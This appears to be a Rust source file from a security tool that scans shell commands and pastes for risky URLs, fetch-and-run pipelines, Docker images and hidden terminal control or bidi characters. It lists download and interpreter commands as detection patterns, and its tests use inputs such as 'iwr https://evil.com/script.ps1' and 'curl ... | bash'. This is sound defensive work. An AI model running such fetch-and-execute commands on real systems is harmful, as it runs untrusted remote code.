Skip to main content

tirith_core/
extract.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7/// Context for Tier 1 scanning.
8#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10    /// Exec-time: command about to be executed (check subcommand).
11    Exec,
12    /// Paste-time: content being pasted (paste subcommand).
13    Paste,
14}
15
16// Include generated Tier 1 patterns from build.rs declarative pattern table.
17#[allow(dead_code)]
18mod tier1_generated {
19    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22/// Expose the build-time extractor IDs for test-time cross-referencing.
23pub fn extractor_ids() -> &'static [&'static str] {
24    tier1_generated::EXTRACTOR_IDS
25}
26
27/// Tier 1 exec-time regex — generated from declarative pattern table in build.rs.
28static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32/// Tier 1 paste-time regex — exec patterns PLUS paste-only patterns (e.g. non-ASCII).
33static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37/// Standard URL extraction regex for Tier 3.
38static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39    Regex::new(
40        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41    )
42    .expect("url regex must compile")
43});
44
45/// Control character patterns for paste-time byte scanning.
46pub struct ByteScanResult {
47    pub has_ansi_escapes: bool,
48    pub has_control_chars: bool,
49    pub has_bidi_controls: bool,
50    pub has_zero_width: bool,
51    pub has_invalid_utf8: bool,
52    pub details: Vec<ByteFinding>,
53}
54
55pub struct ByteFinding {
56    pub offset: usize,
57    pub byte: u8,
58    pub description: String,
59}
60
61/// Tier 1: Fast scan for URL-like content. Returns true if full analysis needed.
62pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63    match context {
64        ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65        ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66    }
67}
68
69/// Scan raw bytes for control characters (paste-time, Tier 1 step 1).
70pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71    let mut result = ByteScanResult {
72        has_ansi_escapes: false,
73        has_control_chars: false,
74        has_bidi_controls: false,
75        has_zero_width: false,
76        has_invalid_utf8: false,
77        details: Vec::new(),
78    };
79
80    // Check for invalid UTF-8
81    if std::str::from_utf8(input).is_err() {
82        result.has_invalid_utf8 = true;
83    }
84
85    let len = input.len();
86    let mut i = 0;
87    while i < len {
88        let b = input[i];
89
90        // Escape sequences: CSI (\e[), OSC (\e]), APC (\e_), DCS (\eP)
91        if b == 0x1b {
92            if i + 1 < len {
93                let next = input[i + 1];
94                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95                    result.has_ansi_escapes = true;
96                    result.details.push(ByteFinding {
97                        offset: i,
98                        byte: b,
99                        description: match next {
100                            b'[' => "CSI escape sequence",
101                            b']' => "OSC escape sequence",
102                            b'_' => "APC escape sequence",
103                            b'P' => "DCS escape sequence",
104                            _ => "escape sequence",
105                        }
106                        .to_string(),
107                    });
108                    i += 2;
109                    continue;
110                }
111            } else {
112                // Trailing lone ESC
113                result.has_ansi_escapes = true;
114                result.details.push(ByteFinding {
115                    offset: i,
116                    byte: b,
117                    description: "trailing escape byte".to_string(),
118                });
119            }
120        }
121
122        // Control characters (< 0x20, excluding common whitespace and ESC)
123        if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124            result.has_control_chars = true;
125            result.details.push(ByteFinding {
126                offset: i,
127                byte: b,
128                description: format!("control character 0x{b:02x}"),
129            });
130        }
131
132        // DEL character
133        if b == 0x7F {
134            result.has_control_chars = true;
135            result.details.push(ByteFinding {
136                offset: i,
137                byte: b,
138                description: "control character 0x7f (DEL)".to_string(),
139            });
140        }
141
142        // Check for UTF-8 multi-byte sequences that are bidi or zero-width
143        if b >= 0xc0 {
144            // Try to decode UTF-8 character
145            let remaining = &input[i..];
146            if let Some(ch) = std::str::from_utf8(remaining)
147                .ok()
148                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149                .and_then(|s| s.chars().next())
150            {
151                // Bidi controls
152                if is_bidi_control(ch) {
153                    result.has_bidi_controls = true;
154                    result.details.push(ByteFinding {
155                        offset: i,
156                        byte: b,
157                        description: format!("bidi control U+{:04X}", ch as u32),
158                    });
159                }
160                // Zero-width characters
161                if is_zero_width(ch) {
162                    result.has_zero_width = true;
163                    result.details.push(ByteFinding {
164                        offset: i,
165                        byte: b,
166                        description: format!("zero-width character U+{:04X}", ch as u32),
167                    });
168                }
169                i += ch.len_utf8();
170                continue;
171            }
172        }
173
174        i += 1;
175    }
176
177    result
178}
179
180/// Check if a character is a bidi control.
181fn is_bidi_control(ch: char) -> bool {
182    matches!(
183        ch,
184        '\u{200E}' // LRM
185        | '\u{200F}' // RLM
186        | '\u{202A}' // LRE
187        | '\u{202B}' // RLE
188        | '\u{202C}' // PDF
189        | '\u{202D}' // LRO
190        | '\u{202E}' // RLO
191        | '\u{2066}' // LRI
192        | '\u{2067}' // RLI
193        | '\u{2068}' // FSI
194        | '\u{2069}' // PDI
195    )
196}
197
198/// Check if a character is zero-width.
199fn is_zero_width(ch: char) -> bool {
200    matches!(
201        ch,
202        '\u{200B}' // ZWSP
203        | '\u{200C}' // ZWNJ
204        | '\u{200D}' // ZWJ
205        | '\u{FEFF}' // BOM / ZWNBSP
206    )
207}
208
209/// Tier 3: Extract URL-like patterns from a command string.
210/// Uses shell-aware tokenization, then extracts URLs from each segment.
211pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212    let segments = tokenize::tokenize(input, shell);
213    let mut results = Vec::new();
214
215    for (seg_idx, segment) in segments.iter().enumerate() {
216        // Extract standard URLs from raw text
217        for mat in URL_REGEX.find_iter(&segment.raw) {
218            let raw = mat.as_str().to_string();
219            let url = parse::parse_url(&raw);
220            results.push(ExtractedUrl {
221                raw,
222                parsed: url,
223                segment_index: seg_idx,
224                in_sink_context: is_sink_context(segment, &segments),
225            });
226        }
227
228        // Check for schemeless URLs in sink contexts
229        // Skip for docker/podman/nerdctl commands since their args are handled as DockerRef
230        let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231            let cmd_lower = cmd.to_lowercase();
232            matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233        });
234        if is_sink_context(segment, &segments) && !is_docker_cmd {
235            for arg in &segment.args {
236                let clean = strip_quotes(arg);
237                if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238                    results.push(ExtractedUrl {
239                        raw: clean.clone(),
240                        parsed: UrlLike::SchemelessHostPath {
241                            host: extract_host_from_schemeless(&clean),
242                            path: extract_path_from_schemeless(&clean),
243                        },
244                        segment_index: seg_idx,
245                        in_sink_context: true,
246                    });
247                }
248            }
249        }
250
251        // Check for Docker refs in docker commands
252        if let Some(cmd) = &segment.command {
253            let cmd_lower = cmd.to_lowercase();
254            if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255                if let Some(docker_subcmd) = segment.args.first() {
256                    let subcmd_lower = docker_subcmd.to_lowercase();
257                    if subcmd_lower == "build" {
258                        // For build, only -t/--tag values are image refs
259                        let mut i = 1;
260                        while i < segment.args.len() {
261                            let arg = strip_quotes(&segment.args[i]);
262                            if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263                                let tag_val = strip_quotes(&segment.args[i + 1]);
264                                if !tag_val.is_empty() {
265                                    let docker_url = parse::parse_docker_ref(&tag_val);
266                                    results.push(ExtractedUrl {
267                                        raw: tag_val,
268                                        parsed: docker_url,
269                                        segment_index: seg_idx,
270                                        in_sink_context: true,
271                                    });
272                                }
273                                i += 2;
274                            } else if arg.starts_with("-t") && arg.len() > 2 {
275                                let tag_val = strip_quotes(&arg[2..]);
276                                let docker_url = parse::parse_docker_ref(&tag_val);
277                                results.push(ExtractedUrl {
278                                    raw: tag_val,
279                                    parsed: docker_url,
280                                    segment_index: seg_idx,
281                                    in_sink_context: true,
282                                });
283                                i += 1;
284                            } else if let Some(val) = arg.strip_prefix("--tag=") {
285                                let tag_val = strip_quotes(val);
286                                let docker_url = parse::parse_docker_ref(&tag_val);
287                                results.push(ExtractedUrl {
288                                    raw: tag_val,
289                                    parsed: docker_url,
290                                    segment_index: seg_idx,
291                                    in_sink_context: true,
292                                });
293                                i += 1;
294                            } else {
295                                i += 1;
296                            }
297                        }
298                    } else if subcmd_lower == "image" {
299                        // docker image pull/push/inspect — actual subcmd is args[1]
300                        if let Some(image_subcmd) = segment.args.get(1) {
301                            let image_subcmd_lower = image_subcmd.to_lowercase();
302                            if matches!(
303                                image_subcmd_lower.as_str(),
304                                "pull" | "push" | "inspect" | "rm" | "tag"
305                            ) {
306                                extract_first_docker_image(
307                                    &segment.args[2..],
308                                    seg_idx,
309                                    &mut results,
310                                );
311                            }
312                        }
313                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314                        // First non-flag arg is image, then stop
315                        extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316                    }
317                }
318            }
319        }
320    }
321
322    results
323}
324
325/// An extracted URL with context.
326#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328    pub raw: String,
329    pub parsed: UrlLike,
330    pub segment_index: usize,
331    pub in_sink_context: bool,
332}
333
334/// Common value-taking flags across docker subcommands.
335const DOCKER_VALUE_FLAGS: &[&str] = &["--platform", "--format", "--filter", "-f", "--label", "-l"];
336
337/// Extract the first non-flag argument as a Docker image reference.
338fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
339    let mut skip_next = false;
340    for arg in args {
341        if skip_next {
342            skip_next = false;
343            continue;
344        }
345        let clean = strip_quotes(arg);
346        if clean == "--" {
347            break;
348        }
349        if clean.starts_with("--") && clean.contains('=') {
350            continue; // --flag=value, skip
351        }
352        if clean.starts_with('-') {
353            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
354                skip_next = true;
355            }
356            continue;
357        }
358        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
359            let docker_url = parse::parse_docker_ref(&clean);
360            results.push(ExtractedUrl {
361                raw: clean,
362                parsed: docker_url,
363                segment_index: seg_idx,
364                in_sink_context: true,
365            });
366        }
367        break; // Only first non-flag arg is the image
368    }
369}
370
371/// Check if a segment is in a "sink" context (executing/downloading).
372fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
373    if let Some(cmd) = &segment.command {
374        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
375        let cmd_lower = cmd_base.to_lowercase();
376        if is_source_command(&cmd_lower) {
377            return true;
378        }
379    }
380
381    // Check if this segment pipes into a sink
382    if let Some(sep) = &segment.preceding_separator {
383        if sep == "|" || sep == "|&" {
384            // This segment receives piped input — check if it's an interpreter
385            if let Some(cmd) = &segment.command {
386                let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
387                if is_interpreter(cmd_base) {
388                    return true;
389                }
390            }
391        }
392    }
393
394    false
395}
396
397fn is_source_command(cmd: &str) -> bool {
398    matches!(
399        cmd,
400        "curl"
401            | "wget"
402            | "fetch"
403            | "scp"
404            | "rsync"
405            | "git"
406            | "ssh"
407            | "docker"
408            | "podman"
409            | "nerdctl"
410            | "pip"
411            | "pip3"
412            | "npm"
413            | "npx"
414            | "yarn"
415            | "pnpm"
416            | "go"
417            | "cargo"
418            | "iwr"
419            | "irm"
420            | "invoke-webrequest"
421            | "invoke-restmethod"
422    )
423}
424
425fn is_interpreter(cmd: &str) -> bool {
426    matches!(
427        cmd,
428        "sh" | "bash"
429            | "zsh"
430            | "dash"
431            | "ksh"
432            | "python"
433            | "python3"
434            | "node"
435            | "perl"
436            | "ruby"
437            | "php"
438            | "iex"
439            | "invoke-expression"
440    )
441}
442
443fn strip_quotes(s: &str) -> String {
444    let s = s.trim();
445    if s.len() >= 2
446        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
447    {
448        s[1..s.len() - 1].to_string()
449    } else {
450        s.to_string()
451    }
452}
453
454fn looks_like_schemeless_host(s: &str) -> bool {
455    // Must contain a dot, not start with -, not be a flag
456    if s.starts_with('-') || !s.contains('.') {
457        return false;
458    }
459    // First component before / or end should look like a domain
460    let host_part = s.split('/').next().unwrap_or(s);
461    if !host_part.contains('.') || host_part.contains(' ') {
462        return false;
463    }
464    // Exclude args where the host part looks like a file (e.g., "install.sh")
465    // Only check the host part (before first /), not the full string with path
466    let file_exts = [
467        ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
468        ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
469        ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
470        ".conf", ".cfg", ".ini", ".toml",
471    ];
472    let host_lower = host_part.to_lowercase();
473    if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
474        return false;
475    }
476    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
477    let labels: Vec<&str> = host_part.split('.').collect();
478    if labels.len() < 2 {
479        return false;
480    }
481    // Last label (TLD) should be 2-6 alphabetic chars
482    let tld = labels.last().unwrap();
483    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
484}
485
486fn extract_host_from_schemeless(s: &str) -> String {
487    s.split('/').next().unwrap_or(s).to_string()
488}
489
490fn extract_path_from_schemeless(s: &str) -> String {
491    if let Some(idx) = s.find('/') {
492        s[idx..].to_string()
493    } else {
494        String::new()
495    }
496}
497
498#[cfg(test)]
499mod tests {
500    use super::*;
501
502    #[test]
503    fn test_tier1_exec_matches_url() {
504        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
505    }
506
507    #[test]
508    fn test_tier1_exec_no_match_simple() {
509        assert!(!tier1_scan("ls -la", ScanContext::Exec));
510    }
511
512    #[test]
513    fn test_tier1_exec_no_match_echo() {
514        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
515    }
516
517    #[test]
518    fn test_tier1_exec_matches_pipe_bash() {
519        assert!(tier1_scan("something | bash", ScanContext::Exec));
520    }
521
522    #[test]
523    fn test_tier1_exec_matches_pipe_sudo_bash() {
524        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
525    }
526
527    #[test]
528    fn test_tier1_exec_matches_pipe_env_bash() {
529        assert!(tier1_scan("something | env bash", ScanContext::Exec));
530    }
531
532    #[test]
533    fn test_tier1_exec_matches_pipe_bin_bash() {
534        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
535    }
536
537    #[test]
538    fn test_tier1_exec_matches_git_scp() {
539        assert!(tier1_scan(
540            "git clone git@github.com:user/repo",
541            ScanContext::Exec
542        ));
543    }
544
545    #[test]
546    fn test_tier1_exec_matches_punycode() {
547        assert!(tier1_scan(
548            "curl https://xn--example-cua.com",
549            ScanContext::Exec
550        ));
551    }
552
553    #[test]
554    fn test_tier1_exec_matches_docker() {
555        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
556    }
557
558    #[test]
559    fn test_tier1_exec_matches_iwr() {
560        assert!(tier1_scan(
561            "iwr https://evil.com/script.ps1",
562            ScanContext::Exec
563        ));
564    }
565
566    #[test]
567    fn test_tier1_exec_matches_curl() {
568        assert!(tier1_scan(
569            "curl https://example.com/install.sh",
570            ScanContext::Exec
571        ));
572    }
573
574    #[test]
575    fn test_tier1_exec_matches_lookalike_tld() {
576        assert!(tier1_scan("open file.zip", ScanContext::Exec));
577    }
578
579    #[test]
580    fn test_tier1_exec_matches_shortener() {
581        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
582    }
583
584    #[test]
585    fn test_tier1_paste_matches_non_ascii() {
586        assert!(tier1_scan("café", ScanContext::Paste));
587    }
588
589    #[test]
590    fn test_tier1_paste_exec_patterns_also_match() {
591        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
592    }
593
594    #[test]
595    fn test_tier1_exec_no_non_ascii() {
596        // Non-ASCII should NOT trigger exec-time scan
597        assert!(!tier1_scan("echo café", ScanContext::Exec));
598    }
599
600    #[test]
601    fn test_byte_scan_ansi() {
602        let input = b"hello \x1b[31mred\x1b[0m world";
603        let result = scan_bytes(input);
604        assert!(result.has_ansi_escapes);
605    }
606
607    #[test]
608    fn test_byte_scan_control_chars() {
609        let input = b"hello\rworld";
610        let result = scan_bytes(input);
611        assert!(result.has_control_chars);
612    }
613
614    #[test]
615    fn test_byte_scan_bidi() {
616        let input = "hello\u{202E}dlrow".as_bytes();
617        let result = scan_bytes(input);
618        assert!(result.has_bidi_controls);
619    }
620
621    #[test]
622    fn test_byte_scan_zero_width() {
623        let input = "hel\u{200B}lo".as_bytes();
624        let result = scan_bytes(input);
625        assert!(result.has_zero_width);
626    }
627
628    #[test]
629    fn test_byte_scan_clean() {
630        let input = b"hello world\n";
631        let result = scan_bytes(input);
632        assert!(!result.has_ansi_escapes);
633        assert!(!result.has_control_chars);
634        assert!(!result.has_bidi_controls);
635        assert!(!result.has_zero_width);
636    }
637
638    #[test]
639    fn test_extract_urls_basic() {
640        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
641        assert_eq!(urls.len(), 1);
642        assert_eq!(urls[0].raw, "https://example.com/install.sh");
643    }
644
645    #[test]
646    fn test_extract_urls_pipe() {
647        let urls = extract_urls(
648            "curl https://example.com/install.sh | bash",
649            ShellType::Posix,
650        );
651        assert!(!urls.is_empty());
652        assert!(urls[0].in_sink_context);
653    }
654
655    #[test]
656    fn test_extract_urls_scp() {
657        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
658        assert!(!urls.is_empty());
659        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
660    }
661
662    #[test]
663    fn test_extract_docker_ref() {
664        let urls = extract_urls("docker pull nginx", ShellType::Posix);
665        let docker_urls: Vec<_> = urls
666            .iter()
667            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
668            .collect();
669        assert_eq!(docker_urls.len(), 1);
670    }
671
672    #[test]
673    fn test_extract_powershell_iwr() {
674        let urls = extract_urls(
675            "iwr https://example.com/script.ps1 | iex",
676            ShellType::PowerShell,
677        );
678        assert!(!urls.is_empty());
679    }
680
681    #[test]
682    fn test_strip_quotes_single_char() {
683        assert_eq!(strip_quotes("\""), "\"");
684        assert_eq!(strip_quotes("'"), "'");
685    }
686
687    #[test]
688    fn test_strip_quotes_empty() {
689        assert_eq!(strip_quotes(""), "");
690    }
691
692    #[test]
693    fn test_scan_bytes_bel_vt_del() {
694        // BEL (0x07)
695        let input = b"hello\x07world";
696        let result = scan_bytes(input);
697        assert!(result.has_control_chars);
698
699        // VT (0x0B)
700        let input = b"hello\x0Bworld";
701        let result = scan_bytes(input);
702        assert!(result.has_control_chars);
703
704        // FF (0x0C)
705        let input = b"hello\x0Cworld";
706        let result = scan_bytes(input);
707        assert!(result.has_control_chars);
708
709        // DEL (0x7F)
710        let input = b"hello\x7Fworld";
711        let result = scan_bytes(input);
712        assert!(result.has_control_chars);
713    }
714
715    #[test]
716    fn test_scan_bytes_osc_apc_dcs() {
717        // OSC: \e]
718        let input = b"hello\x1b]0;title\x07world";
719        let result = scan_bytes(input);
720        assert!(result.has_ansi_escapes);
721
722        // APC: \e_
723        let input = b"hello\x1b_dataworld";
724        let result = scan_bytes(input);
725        assert!(result.has_ansi_escapes);
726
727        // DCS: \eP
728        let input = b"hello\x1bPdataworld";
729        let result = scan_bytes(input);
730        assert!(result.has_ansi_escapes);
731    }
732
733    #[test]
734    fn test_schemeless_long_tld() {
735        assert!(looks_like_schemeless_host("example.academy"));
736        assert!(looks_like_schemeless_host("example.photography"));
737    }
738
739    #[test]
740    fn test_segment_index_correct() {
741        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
742        // Each URL should have the segment index of the segment it came from
743        for url in &urls {
744            // segment_index should be 0 or 1, not an incrementing counter
745            assert!(url.segment_index <= 1);
746        }
747    }
748
749    #[test]
750    fn test_docker_build_context_not_image() {
751        let urls = extract_urls("docker build .", ShellType::Posix);
752        let docker_urls: Vec<_> = urls
753            .iter()
754            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
755            .collect();
756        assert_eq!(
757            docker_urls.len(),
758            0,
759            "build context '.' should not be treated as image"
760        );
761    }
762
763    #[test]
764    fn test_docker_image_subcmd() {
765        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
766        let docker_urls: Vec<_> = urls
767            .iter()
768            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
769            .collect();
770        assert_eq!(docker_urls.len(), 1);
771    }
772
773    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
774    /// that all generated fragment counts are positive.
775    /// This is a module boundary enforcement test — ensures no secret
776    /// extractors exist outside the declarative pattern table.
777    #[test]
778    fn test_tier1_module_boundary_enforcement() {
779        // Verify extractor IDs are generated
780        let ids = tier1_generated::EXTRACTOR_IDS;
781        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
782        // Verify exec and paste fragment counts
783        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
784        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
785        assert!(exec_count > 0, "Must have exec fragments");
786        assert!(
787            paste_count >= exec_count,
788            "Paste fragments must be superset of exec fragments"
789        );
790        // Verify the generated patterns are valid regexes
791        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
792            .expect("Generated exec pattern must be valid regex");
793        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
794            .expect("Generated paste pattern must be valid regex");
795    }
796}